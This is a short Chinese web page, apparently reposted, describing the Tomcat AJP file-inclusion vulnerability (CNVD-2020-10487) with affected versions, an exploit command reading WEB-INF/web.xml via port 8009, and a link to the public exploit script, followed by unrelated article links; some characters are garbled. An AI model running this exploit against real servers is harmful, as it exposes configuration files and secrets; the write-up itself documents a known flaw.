由于Tomcat 默认开启的AJP 服务（8009 端?）存在?处?件包含缺陷，攻击者可构造恶意的请求包进??件包含操作，进?读取受影响Tomcat 服务器上的Web?录?件 。
影响版本
tomcat 6tomcat 7 < 7.0.100tomcat 8 < 8.5.51tomcat 9 < 9.0.31漏洞利?
./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.16.193 -p 8009 -f WEBINF/web.xml脚本下载地址：
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

文章插图
 


文章插图
 
创建hello.txt，并读取：

文章插图
 


文章插图
 
=== Well Done ===

推荐阅读

• 

  相亲男不联系我
• 

  当年“油改气”的司机为何后悔了？这几个缺点谁能忍
• 

  空调遥控器特殊按键使用方法及注意事项 格力空调遥控器的使用
• 

  车与生活|红旗L5现身街头，车牌照比汽车本身还吸引人，坐标山东
• 

  【小晓聊娱乐】李亚鹏周杰同框，周迅到场，嫣然基金音乐会：王菲李嫣跳舞狂嗨
• 

  YY育儿弘伟|牢记这4个注意事项，勿因乱吃引发“胎停育”，孕期饮食禁忌多
• 

  全球军事热评|莫斯科：重大胜利，俄罗斯赢得伊朗军购大单？从战斗机潜艇到导弹
• 

  上汽集团|销量下滑之后，各大车企都在哪里挖掘利润？
• 

  三国两晋南北朝|诸葛亮好朋友徐庶、崔州平、石广元和孟公威四人，最后结局如何？
• 

  中国知识产权报▲亿元！新能源汽车领域现天价索赔，1件专利1.2
• 

  小彩说娱乐|男女主都没火，几位配角都红成一线，最神奇的一部“琼瑶剧”
• 

  怎么断母乳最快最有效
• 

  十个月宝宝喝奶量表
• 

  柚子皮有什么功能? 柚子皮有哪些用处
• 

  消化疾病|肝不好的人眼睛会出卖你，快看看你有这些信号吗？
• 

  excel数据分析操作方法 excel如何数据分析某一产品的总数
• 

  柠檬|减肥排毒最佳品是什么呢？
• 

  潮品汇|12了，看了Reno4 Pro，我决定不再等iPhone
• 

  「小马食图」做法简单，加上秘制酱料，让你一次吃个够，六款特色烤羊肉菜品
• 

  俊男美女|宋美龄卸妆后到底是什么样子，她的贴身佣人回忆说：判若两人

• 避免开源代码漏洞的4个最佳实践
• 基于SCL语言的结构化编程案例，常见问题解答
• WPS如何启用宏功能，VBA组件安装
• 吃三七的禁忌有哪些
• ?香菇青菜鸡肉粥
• Web漏洞扫描——AWVS漏扫工具的使用
• phpStudy nginx 解析漏洞通告
• 离合器常见的故障有哪四种？
• 痘痘|十问十答，夏季脸上长痘常见问题解答，避坑指南
• Ruckus 路由器多个漏洞分析